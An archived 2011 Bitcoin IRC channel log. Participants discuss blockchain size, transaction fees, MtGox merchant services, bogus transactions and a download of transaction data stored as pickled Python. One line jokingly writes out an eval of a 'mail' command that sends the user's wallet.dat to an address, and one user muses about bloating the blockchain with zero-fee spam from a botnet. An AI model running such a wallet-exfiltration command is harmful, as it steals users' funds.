1 2011-08-28 00:19:18 <lfm> max block size: 334491, at block: #134334 2011-07-02 05:15:42
  2 2011-08-28 02:50:21 <CIA-101> bitcoin: Con Kolivas * r8a7b9acd0060 cgminer/main.c: Switching between redrawing windows does not fix the crash with old libncurses, so redraw both windows, but only when the window size hasn't changed.
  3 2011-08-28 04:22:17 <zeropointo> anyone here familiar with the boost::asio networking api?
  4 2011-08-28 05:42:30 <Tamo> Anyone want to make 0.25? I need a wget command that will download http://www.example/com/images/{100..200}.png, which outputs to /home/{100..200}.png :)
  5 2011-08-28 05:42:34 <Tamo> wget -O {100..200}.png http://www.example.com/images/{100..200}.png - example
  6 2011-08-28 05:43:10 <theymos> Use a bash for loop.
  7 2011-08-28 05:43:37 <Tamo> Hand me the command and ill send0r 0.25, tis super basic stuff, I'm just an ultra noob :)
  8 2011-08-28 05:44:15 <tcatm> wget http://www.example.com/images/{100..200}.png # should work
  9 2011-08-28 05:44:28 <Tamo> I need it to output too
 10 2011-08-28 05:45:16 <theymos> for i in {100..200}; do wget -O $i.png http://www.example.com/images/$i ; done
 11 2011-08-28 05:46:20 <upb> or just use curl which has that built in
 12 2011-08-28 06:40:54 <erle-> only bitcoin is uninflatable:
 13 2011-08-28 06:40:55 <erle-> http://www.reuters.com/article/2011/08/25/us-planet-diamond-idUSTRE77O69A20110825?dlvrit=309301&feedType=RSS&feedName=scienceNews
 14 2011-08-28 06:44:03 <lfm> erle-: you figgure?
 15 2011-08-28 10:14:28 <SomeoneWeird> ok, i've changed the irc channels my client is connecting to, yet when i compile+run im still getting 2+ connections - what gives?
 16 2011-08-28 10:20:08 <Eliel> SomeoneWeird: did you do anything to dnsseed code?
 17 2011-08-28 10:20:22 <SomeoneWeird> hrmm not that i know of
 18 2011-08-28 10:22:47 <SomeoneWeird> that why Eliel ?
 19 2011-08-28 10:26:11 <Incitatus> MagicalTux, when will your merchant API be back up?
 20 2011-08-28 10:26:18 <Incitatus> or anyone who knows
 21 2011-08-28 10:26:19 <Incitatus> ...
 22 2011-08-28 10:26:41 <MagicalTux> Incitatus: the API has been up for a while, waiting for merchants currently
 23 2011-08-28 10:26:56 <MagicalTux> it'll be implemented in our mobile app soon too
 24 2011-08-28 10:26:58 <Eliel> SomeoneWeird: well, it sounded to me like you're trying to control how many nodes you connect to. dnsseed would connect to a lot of them.
 25 2011-08-28 10:26:58 <Incitatus> I checked yesterday and it says that it's down
 26 2011-08-28 10:27:38 <Incitatus> "Merchant service are currently unavailable, but will be back soon."
 27 2011-08-28 10:28:11 <Incitatus> sorry, the merchant services, I guess, can a merchant just set up an account and receive payments on MtGox?
 28 2011-08-28 10:28:23 <Incitatus> or what is merchant services
 29 2011-08-28 10:28:55 <MagicalTux> Incitatus: the new ones are not documented until we get some merchants to participate into tests
 30 2011-08-28 10:29:06 <MagicalTux> so far nobody has presented any interest in the SCI, so it's been put aside
 31 2011-08-28 10:29:54 <ryannathans> ohai
 32 2011-08-28 10:30:07 <ryannathans> what happens when block chain becomes gigabytes
 33 2011-08-28 10:30:13 <ryannathans> will there be any optimisations?
 34 2011-08-28 10:32:40 <Incitatus> magicaltux I'm not sure what that means :/ but i have a merchant who wants to be able to accept instant transfers from MtGox to MtGox account, can he do that via a regular account?
 35 2011-08-28 10:32:57 <MagicalTux> Incitatus: yes
 36 2011-08-28 10:33:04 <Incitatus> will there be some sort of limit as to how much he can receive per day?
 37 2011-08-28 10:33:23 <MagicalTux> no, however each user have a limit as to how much they can send per day
 38 2011-08-28 10:33:45 <Incitatus> ok good to know, thanks magicaltux
 39 2011-08-28 10:34:03 <MagicalTux> Incitatus: just contact me on admin@mtgox.com if you ahve questions
 40 2011-08-28 10:38:02 <Incitatus> thanks
 41 2011-08-28 10:38:25 <ryannathans> can someone answer my Q thanks?
 42 2011-08-28 10:38:59 <SomeoneWeird> dont know about optimisations to the actual chain ryannathans
 43 2011-08-28 10:39:06 <SomeoneWeird> but the clients will be optimised
 44 2011-08-28 10:39:10 <ryannathans> hope so
 45 2011-08-28 10:39:23 <ryannathans> it will be a pain in the ass for a blockchain to be gigabytes long
 46 2011-08-28 10:39:55 <SomeoneWeird> i was gunna submit a patch that makes it load the chain backwards
 47 2011-08-28 10:40:16 <SomeoneWeird> then you can see + use all your recent coins while the rest loads
 48 2011-08-28 10:40:36 <asher^> .24 downloads the block chain really quickly though
 49 2011-08-28 10:43:17 <SomeoneWeird> yeah i know
 50 2011-08-28 10:46:06 <BitManiac> a few gigabytes is not really a problem
 51 2011-08-28 10:46:16 <BitManiac> it's less than a 720p movie
 52 2011-08-28 10:46:33 <BitManiac> people can use an ewallet if their computer / net connection sucks
 53 2011-08-28 10:48:11 <Eliel> ryannathans: the blockchain is going to hit gigabytes, possibly even terabytes eventually. The size increase can be slowed by optimizations that clear out old used up transactions from the chain. While that does reduce the size significantly, it won't change the asymptotic function for the size.
 54 2011-08-28 10:48:28 <SomeoneWeird> 720p movies are only like 700 megs
 55 2011-08-28 10:50:12 <CIA-101> bitcoin: Con Kolivas * r8d3931161350 cgminer/main.c: Reinstate minimum 1 extra in queue to make it extremely unlikely to ever have 0 staged work items and any idle time.
 56 2011-08-28 10:50:13 <CIA-101> bitcoin: Con Kolivas * rfc46d57d626e cgminer/main.c: Return -1 if no input is detected from the menu to prevent it being interpreted as a 0.
 57 2011-08-28 10:55:22 <BitManiac> <SomeoneWeird> 720p movies are only like 700 megs
 58 2011-08-28 10:55:24 <BitManiac> wtf
 59 2011-08-28 10:55:34 <BitManiac> maybe with no sound and mega compression
 60 2011-08-28 10:55:44 <BitManiac> average size for a 720p movie is about 4gb
 61 2011-08-28 10:55:58 <BitManiac> I download maybe 10 a month
 62 2011-08-28 10:56:17 <BitManiac> lots of people download 1080p movies
 63 2011-08-28 10:56:21 <BitManiac> 8-10gb each
 64 2011-08-28 10:56:50 <BitManiac> thousands and thousands of downloads for those on TPB for example
 65 2011-08-28 10:56:51 <asher^> i downloaded one the other day that was 16 :-|
 66 2011-08-28 10:56:56 <BitManiac> and that's just a small site
 67 2011-08-28 10:57:13 <BitManiac> I really don't think 10-20gb for a blockchain is a huge issue
 68 2011-08-28 10:57:16 <SomeoneWeird> 0.o
 69 2011-08-28 10:57:30 <asher^> wtf the blockchain is that big?
 70 2011-08-28 10:57:35 <BitManiac> by the time it reaches 1TB, then 1TB will fit on a USB drive
 71 2011-08-28 10:57:36 <phantomcircuit> no it isn't
 72 2011-08-28 10:57:46 <BitManiac> and everyhone will have gigabit net connections
 73 2011-08-28 10:57:59 <phantomcircuit> the issue is disk latency more than anything else
 74 2011-08-28 10:58:05 <SomeoneWeird> asher^ it's <1gb atm
 75 2011-08-28 10:58:13 <asher^> thought so
 76 2011-08-28 10:58:13 <BitManiac> yeah
 77 2011-08-28 10:58:52 <Rennex> the thing is, i have all my HD movies on big hard disks. i have bitcoin installed on a ssd, and i really don't care much about having the entire blockchain there taking up 1GB..
 78 2011-08-28 10:59:06 <Rennex> i mean
 79 2011-08-28 10:59:22 <Rennex> i do care that it takes 1GB, i don't care about having the entire chain, i'd prefer it to take 100MB or so :P
 80 2011-08-28 10:59:28 <SomeoneWeird> yeah lol
 81 2011-08-28 10:59:36 <BitManiac> maybe later versions of the client can be configured to only download the last 1gb of the chain
 82 2011-08-28 10:59:36 <Rennex> screw the old blocks
 83 2011-08-28 10:59:50 <SomeoneWeird> well by the time that the chain is 5+gb ssd's will be standard
 84 2011-08-28 11:00:02 <BitManiac> but then you lose sight of coins you received many years ago
 85 2011-08-28 11:00:30 <SomeoneWeird> or
 86 2011-08-28 11:00:37 <BitManiac> selective block saving
 87 2011-08-28 11:00:38 <SomeoneWeird> the client keeps the blocks that are important
 88 2011-08-28 11:00:41 <SomeoneWeird> yeah
 89 2011-08-28 11:00:42 <BitManiac> only save blocks that relate to you
 90 2011-08-28 11:00:45 <SomeoneWeird> ^^
 91 2011-08-28 11:00:46 <SomeoneWeird> :)
 92 2011-08-28 11:00:53 <Rennex> the old blocks should just be combined into a "start state", just forget all old movements of the coins
 93 2011-08-28 11:01:02 <Rennex> or something
 94 2011-08-28 11:01:04 <SomeoneWeird> hrmm yeah
 95 2011-08-28 11:01:05 <BitManiac> would break the effectiveness of the p2p network though
 96 2011-08-28 11:01:08 <SomeoneWeird> thatd work i think
 97 2011-08-28 11:01:21 <BitManiac> if peers only held some blocks and not all of them
 98 2011-08-28 11:01:28 <BitManiac> would be difficult to download the entire chain
 99 2011-08-28 11:01:34 <Eliel> there will be lightweight clients for people who want them.
100 2011-08-28 11:01:42 <Rennex> BitManiac: i know...
101 2011-08-28 11:01:52 <Rennex> but yeah, something like a lightweight client, or a space-saving setting that defaults to off
102 2011-08-28 11:02:16 <BitManiac> maybe if you run the full client, you earn 0.001btc for every gb transferred
103 2011-08-28 11:02:32 <BitManiac> and if you run the light client, you pay 0.001btc for every btc transferred
104 2011-08-28 11:02:34 <BitManiac> or something
105 2011-08-28 11:03:03 <SomeoneWeird> ooo
106 2011-08-28 11:03:04 <SomeoneWeird> nice :)
107 2011-08-28 11:03:19 <Eliel> BitManiac: every pool, at the minimum will need to run full node.
108 2011-08-28 11:03:29 <Eliel> otherwise mining is impossible.
109 2011-08-28 11:03:47 <BitManiac> sure
110 2011-08-28 11:03:55 <BitManiac> but then we only have 100 full nodes
111 2011-08-28 11:04:03 <BitManiac> or however many mining pools there are
112 2011-08-28 11:04:20 <SomeoneWeird> less than 100
113 2011-08-28 11:04:33 <Eliel> although, with the p2p pool and the way bitpenny pool operates, every miner needs to run a full node.
114 2011-08-28 11:04:54 <SomeoneWeird> hrmm
115 2011-08-28 11:05:02 <BitManiac> mm
116 2011-08-28 11:05:04 <BitManiac> anyway
117 2011-08-28 11:05:15 <BitManiac> how many transactions does there need to be to double the size of the current chain
118 2011-08-28 11:05:39 <SomeoneWeird> hrmm idnno
119 2011-08-28 11:05:44 <BitManiac> more than all of the transactions so far I think
120 2011-08-28 11:06:34 <SomeoneWeird> wut
121 2011-08-28 11:06:45 <SomeoneWeird> so
122 2011-08-28 11:07:00 <ryannathans> spam 1btc to yourself
123 2011-08-28 11:07:04 <ryannathans> thousands of times
124 2011-08-28 11:07:11 <ryannathans> you mad btc blockchain?!
125 2011-08-28 11:07:12 <SomeoneWeird> $dbltxs > ($currenttxs^2)?
126 2011-08-28 11:07:20 <SomeoneWeird> lol ryan
127 2011-08-28 11:07:34 <ryannathans> no tx fee on 1btc
128 2011-08-28 11:07:39 <ryannathans> not when i last checked
129 2011-08-28 11:07:40 <SomeoneWeird> there is
130 2011-08-28 11:07:44 <SomeoneWeird> well
131 2011-08-28 11:07:47 <SomeoneWeird> technically no
132 2011-08-28 11:07:52 <SomeoneWeird> but using the official client there is
133 2011-08-28 11:07:59 <ryannathans> lolwut
134 2011-08-28 11:08:02 <ryannathans> i need to check tis.
135 2011-08-28 11:08:17 <ryannathans> "Pay Transaction Fee" 0.00
136 2011-08-28 11:08:22 <ryannathans> send 1 btc to mysef
137 2011-08-28 11:08:24 <ryannathans> and lets see
138 2011-08-28 11:08:33 <SomeoneWeird> lol that doesn't do shit for the main client
139 2011-08-28 11:08:40 <ryannathans> eh?
140 2011-08-28 11:08:47 <ryannathans> i'm seeing if theres a fee
141 2011-08-28 11:09:18 <SomeoneWeird> if you set the transaction fee in bitcoin.conf or something the client ignores it afaik
142 2011-08-28 11:09:20 <SomeoneWeird> brb
143 2011-08-28 11:09:46 <ryannathans> this is in settings of main client
144 2011-08-28 11:10:25 <ryannathans> NO FEE
145 2011-08-28 11:10:26 <ryannathans> WOOT
146 2011-08-28 11:11:29 <ryannathans> in theory, one could set up a wallet with some coins and send a second wallet and spam coins back and forward with no fee. Blockchain will get mad.
147 2011-08-28 11:11:50 <ryannathans> size would eventually grow huge
148 2011-08-28 11:11:57 <ryannathans> make it fit into a botnet
149 2011-08-28 11:12:02 <ryannathans> and btc gets mad
150 2011-08-28 11:12:08 <SomeoneWeird> you sure ryannathans 0.o
151 2011-08-28 11:12:22 <ryannathans> I'm Ryan Shaw
152 2011-08-28 11:12:27 <SomeoneWeird> i know that
153 2011-08-28 11:12:30 <ryannathans> xD
154 2011-08-28 11:12:33 <SomeoneWeird> lol
155 2011-08-28 11:13:27 <ryannathans> would next block have my TX in it?
156 2011-08-28 11:13:34 <SomeoneWeird> herm
157 2011-08-28 11:13:38 <SomeoneWeird> you sent with no fee
158 2011-08-28 11:13:39 <SomeoneWeird> ?
159 2011-08-28 11:13:57 <ryannathans> yup
160 2011-08-28 11:14:03 <ryannathans> it was big enough
161 2011-08-28 11:14:07 <ryannathans> no fee was needed
162 2011-08-28 11:14:10 <ryannathans> only fees on small tx's
163 2011-08-28 11:14:17 <SomeoneWeird> good luck getting it included in any block for a while :)
164 2011-08-28 11:14:33 <ryannathans> why?
165 2011-08-28 11:14:49 <SomeoneWeird> because
166 2011-08-28 11:14:53 <SomeoneWeird> it was sent with a 0 fee
167 2011-08-28 11:16:49 <ryannathans> the block just passed was 98% 0 fee
168 2011-08-28 11:17:49 <ryannathans> lol
169 2011-08-28 11:17:51 <ryannathans> it's in there
170 2011-08-28 11:18:12 <ryannathans> it says i sent 1.01
171 2011-08-28 11:18:37 <ryannathans> http://blockexplorer.com/tx/6edd84316c50b6e30a11358e0009711eee38c1be00bfb3e668533b76c9e173ca
172 2011-08-28 11:18:43 <SomeoneWeird> exactly
173 2011-08-28 11:18:48 <SomeoneWeird> you sent 1btc didn't you
174 2011-08-28 11:18:52 <SomeoneWeird> not 1.01
175 2011-08-28 11:19:07 <ryannathans> yes
176 2011-08-28 11:19:15 <ryannathans> but my balance is still exactly the same
177 2011-08-28 11:19:19 <ryannathans> not .01 off
178 2011-08-28 11:19:22 <SomeoneWeird> hrmm
179 2011-08-28 11:19:30 <ryannathans> .01 generated from no where
180 2011-08-28 11:19:46 <SomeoneWeird> no
181 2011-08-28 11:19:56 <SomeoneWeird> you had 1.01 from that address
182 2011-08-28 11:20:06 <SomeoneWeird> you sent 1 off to another address
183 2011-08-28 11:20:13 <SomeoneWeird> and then the extra gets sent back to you
184 2011-08-28 11:20:20 <ryannathans> i dont own the .01 address though
185 2011-08-28 11:20:36 <sytse> you probably do
186 2011-08-28 11:20:44 <SomeoneWeird> you do ryan
187 2011-08-28 11:20:48 <sytse> the bitcoin UI doesn't show all addresses you have
188 2011-08-28 11:20:53 <SomeoneWeird> this ^
189 2011-08-28 11:21:04 <sytse> (because that would only lead to clutter)
190 2011-08-28 11:21:05 <ryannathans> aww
191 2011-08-28 11:21:27 <luke-jr> ;;bc,stats
192 2011-08-28 11:21:29 <gribble> Current Blocks: 142914 | Current Difficulty: 1805700.8361937 | Next Difficulty At Block: 143135 | Next Difficulty In: 221 blocks | Next Difficulty In About: 1 day, 13 hours, 4 minutes, and 44 seconds | Next Difficulty Estimate: 1791834.68851753
193 2011-08-28 11:21:56 <ryannathans> so I added 2.056 kilobytes to the block chain at no cost to me, In theory I could do this over and over and over very fast and make the blockchain huge
194 2011-08-28 11:22:01 <ryannathans> but i like btc too much to do that
195 2011-08-28 11:22:58 <ryannathans> hmm, there needs to be something to fix that.
196 2011-08-28 11:23:37 <SomeoneWeird> there is.
197 2011-08-28 11:23:38 <SomeoneWeird> fees.
198 2011-08-28 11:23:51 <SomeoneWeird> most pools will favour tx's that have fees over ones that dont
199 2011-08-28 11:23:53 <SomeoneWeird> you just got lucky
200 2011-08-28 11:24:02 <ryannathans> i find i funny how it was instant xD
201 2011-08-28 11:24:17 <ryannathans> so what, they still occur, thousands will build up and still be processed
202 2011-08-28 11:24:37 <ryannathans> considering like 5 txs in every block have fees and the rest have none
203 2011-08-28 11:25:52 <SomeoneWeird> derp no
204 2011-08-28 11:25:52 <sytse> a big miner will even have incentive to put in so many free transactions that transactions without fees won't go through most of the time for months
205 2011-08-28 11:25:55 <SomeoneWeird> last time i checked
206 2011-08-28 11:26:05 <SomeoneWeird> yeh
207 2011-08-28 11:26:23 <sytse> because that'll sweeten the pot for all miners, because more people will start adding fees
208 2011-08-28 11:27:05 <ryannathans> maybe it's a good thing and i will end up getting more from mining
209 2011-08-28 11:27:06 <sytse> let's hope it doesn't actually happen
210 2011-08-28 11:27:08 <ryannathans> xD
211 2011-08-28 11:27:12 <ryannathans> hopefully
212 2011-08-28 11:27:12 <sytse> lol
213 2011-08-28 11:27:43 <SomeoneWeird> unless your a pool its bad for you
214 2011-08-28 11:27:54 <sytse> yes.
215 2011-08-28 11:28:21 <ryannathans> still, what I am saying is that exploit is there and sometime someone will exploit it
216 2011-08-28 11:29:09 <SomeoneWeird> ryan run your client with -debug double click on the transaction and see if it has a fee then
217 2011-08-28 11:29:42 <ryannathans> my balance is still 7.03295329 and after it's still the same
218 2011-08-28 11:29:45 <ryannathans> i lost nothing in fees
219 2011-08-28 11:30:31 <SomeoneWeird> heh
220 2011-08-28 11:31:10 <sytse> if it doesn't warn you about fees
221 2011-08-28 11:31:20 <sytse> you're not adding a fee
222 2011-08-28 11:31:40 <ryannathans> ^^
223 2011-08-28 11:34:24 <SomeoneWeird> heh
224 2011-08-28 11:43:27 <ryannathans> well that was an interesting discussion
225 2011-08-28 11:43:37 <ryannathans> i'm off to work on my essay that's due shortly xD
226 2011-08-28 11:44:32 <SomeoneWeird> lo
227 2011-08-28 11:44:33 <SomeoneWeird> l
228 2011-08-28 11:55:12 <CIA-101> bitcoin: Con Kolivas * r83bb42801d4b cgminer/configure.ac: Make pthread, libcurl and libcurses library checks mandatory or fail.
229 2011-08-28 11:55:13 <CIA-101> bitcoin: Con Kolivas * r10ed8e9d4171 cgminer/configure.ac: Add a --disable-opencl configure option to make it possible to override detection of opencl and build without GPU mining support.
230 2011-08-28 12:25:14 <CIA-101> bitcoin: Con Kolivas * r5848c11004d1 cgminer/ocl.c: Confusion over the variable name for number of devices was passing a bogus value which likely was causing the zero sized binary issue.
231 2011-08-28 12:41:37 <copumpkin> are there any sites out there that track bogus transactions that are spotted on the network?
232 2011-08-28 12:42:46 <SomeoneWeird> define bogus
233 2011-08-28 12:43:02 <tcatm> http://blockexplorer.com/txstats -> latest strange tx
234 2011-08-28 12:43:09 <copumpkin> yeah, not on there
235 2011-08-28 12:43:16 <copumpkin> it appeared at first on bitcoincharts.com/bitcoin but never made it into a block
236 2011-08-28 12:43:44 <tcatm> probably a tx where an input is used twice
237 2011-08-28 12:44:03 <tcatm> for some reason bitcoin won't reject those
238 2011-08-28 12:45:08 <copumpkin> tcatm: you run bitcoincharts? is there a place to see bogus transactions your site has seen?
239 2011-08-28 12:45:11 <CIA-101> bitcoin: Con Kolivas * refa17318223c cgminer/main.c: cgminer no longer supports default url user and pass so remove them.
240 2011-08-28 12:45:15 <copumpkin> in case he sent his bogus transaction specifically to you
241 2011-08-28 12:45:20 <copumpkin> and then you purged it from the list?
242 2011-08-28 12:45:50 <tcatm> I purge the list from time to time but it shows all tx it knows of that aren't included in any block yet
243 2011-08-28 12:46:30 <copumpkin> hmm
244 2011-08-28 12:46:44 <copumpkin> do you have any clue why I might have seen another 20 btc transaction on that list
245 2011-08-28 12:46:51 <copumpkin> that is no longer on the list but not in any block?
246 2011-08-28 12:47:29 <tcatm> what's its txid?
247 2011-08-28 12:48:24 <copumpkin> I don't have that :/ I just saw it on /bitcoin and assumed it was legit, since I'd received some other legit payments from the guy
248 2011-08-28 12:48:29 <copumpkin> http://blockexplorer.com/address/176fZqRi68eZteUBp89GcEp37vK2wzVuQo is the destination address
249 2011-08-28 12:49:15 <copumpkin> there should be two 20-btc txns going into that
250 2011-08-28 12:50:06 <tcatm> I need the txid to query my database
251 2011-08-28 12:50:10 <copumpkin> ah :/
252 2011-08-28 12:50:53 <tcatm> or else I'd have to decode all 1389287 transactions
253 2011-08-28 12:50:59 <copumpkin> damn :P
254 2011-08-28 12:53:15 <SomeoneWeird> lol
255 2011-08-28 12:53:26 <phantomcircuit> tcatm, you have the info available for download somewhere
256 2011-08-28 12:53:31 <phantomcircuit> i'll do it for him...
257 2011-08-28 12:58:13 <tcatm> phantomcircuit: the format is a little uncommon (pickled python objects) but I can give you a database dump
258 2011-08-28 12:58:42 <tcatm> assuming you have a blockchain so you can figure out which transactions are already in blocks and which are not
259 2011-08-28 12:59:35 <copumpkin> the thing was last night
260 2011-08-28 12:59:40 <copumpkin> so it wasn't that long ago
261 2011-08-28 12:59:47 <copumpkin> phantomcircuit: thanks :)
262 2011-08-28 13:00:03 <phantomcircuit> tcatm, yeah how much data is it
263 2011-08-28 13:00:27 <copumpkin> I'd be curious to just see the last day of txns and look for ones directed towards that address
264 2011-08-28 13:00:32 <copumpkin> two of them I already know are in a block
265 2011-08-28 13:00:39 <copumpkin> one of them I'd just like to get more info on
266 2011-08-28 13:00:48 <phantomcircuit> oh yeah much smaller since we only need relatively recent ones
267 2011-08-28 13:01:05 <tcatm> phantomcircuit: http://eu1.bitcoincharts.com/txcache (2.6 GB)
268 2011-08-28 13:01:11 <copumpkin> lol
269 2011-08-28 13:07:50 <copumpkin> tcatm: do you have smaller slices of that?
270 2011-08-28 13:09:50 <tcatm> sure. I can filter by txid
271 2011-08-28 13:10:04 <copumpkin> not by time?
272 2011-08-28 13:11:15 <tcatm> not reliably
273 2011-08-28 13:12:04 <tcatm> http://eu1.bitcoincharts.com/txcache2
274 2011-08-28 13:13:55 <copumpkin> is this bson or something?
275 2011-08-28 13:15:22 <tcatm> pickled python
276 2011-08-28 13:15:44 <copumpkin> ah
277 2011-08-28 13:17:18 <phantomcircuit> i love pickles
278 2011-08-28 13:17:22 <phantomcircuit> they're so dangerous
279 2011-08-28 13:17:23 <phantomcircuit> lol
280 2011-08-28 13:17:45 <SomeoneWeird> 0.o
281 2011-08-28 13:18:14 <tcatm> oh yes, I've added an evil eval("mail $address < .bitcoin/wallet.dat") somewhere ;)
282 2011-08-28 13:18:25 <copumpkin> lol
283 2011-08-28 13:19:35 <phantomcircuit> tcatm, glad to see you know what im talking about
284 2011-08-28 13:19:36 <phantomcircuit> lol
285 2011-08-28 13:25:12 <CIA-101> bitcoin: Con Kolivas * ree5b476402fa cgminer/main.c: Don't show value of intensity since it's dynamic by default.
286 2011-08-28 13:25:15 <CIA-101> bitcoin: Con Kolivas * r3aee066b88c1 cgminer/main.c: Add options to explicitly enable CPU mining or disable GPU mining.
287 2011-08-28 13:25:16 <CIA-101> bitcoin: Con Kolivas * rf0cc29323933 cgminer/main.c: Convert the opt queue into a minimum number of work items to have queued instead of an extra number to decrease risk of getting idle devices without increasing risk of higher rejects.
288 2011-08-28 13:26:59 <Blitzboom> has there ever been a consecutive difficulty decrease of 2x in bitcoin history so far?
289 2011-08-28 13:27:14 <Blitzboom> (because its about to happen now)
290 2011-08-28 13:28:08 <tcatm> Blitzboom: ??
291 2011-08-28 13:28:23 <Blitzboom> 2 difficulty decreases in a row
292 2011-08-28 13:28:43 <tcatm> I think that's the first time
293 2011-08-28 13:29:12 <Blitzboom> http://bitcoin.sipa.be/speed-ever.png
294 2011-08-28 13:29:30 <Blitzboom> yep, does look like it
295 2011-08-28 13:30:10 <Eliel> this is also the first time there's been major bad news about bitcoin ever
296 2011-08-28 13:30:15 <Eliel> or related to bitcoin
297 2011-08-28 13:30:17 <Blitzboom> lol, no
298 2011-08-28 13:30:29 <Blitzboom> weve had those since mtgox was hacked, which was in june
299 2011-08-28 13:30:39 <Eliel> that's what I mean :D
300 2011-08-28 13:31:59 <Eliel> oh, intresting, network hashrate appears to be averaging around 10Th/s right now
301 2011-08-28 13:33:44 <tcatm> copumpkin, phantomcircuit: did you download all data you need? (so I can rm the files)
302 2011-08-28 13:34:52 <phantomcircuit> only 51 minutes to go
303 2011-08-28 13:35:05 <CIA-101> bitcoin: Christopher Head * r51610c01a4b9 gentoo/net-p2p/bitcoind/files/bitcoin.initd: Increase shutdown wait from 10s to 30s.
304 2011-08-28 13:35:05 <phantomcircuit> one sec ill use a server as an intermediary
305 2011-08-28 13:35:07 <CIA-101> bitcoin: Florian Schmaus * r3b2943a14de5 gentoo/net-p2p/bitcoind/Manifest: updated bitcoind Manifest because of bitcoin.init.d changes
306 2011-08-28 13:37:49 <tcatm> phantomcircuit: no that's fine. just let me know when you've finished
307 2011-08-28 13:53:21 <phantomcircuit> tcatm, k done
308 2011-08-28 13:53:33 <tcatm> ack
309 2011-08-28 13:59:58 <copumpkin> phantomcircuit: any luck?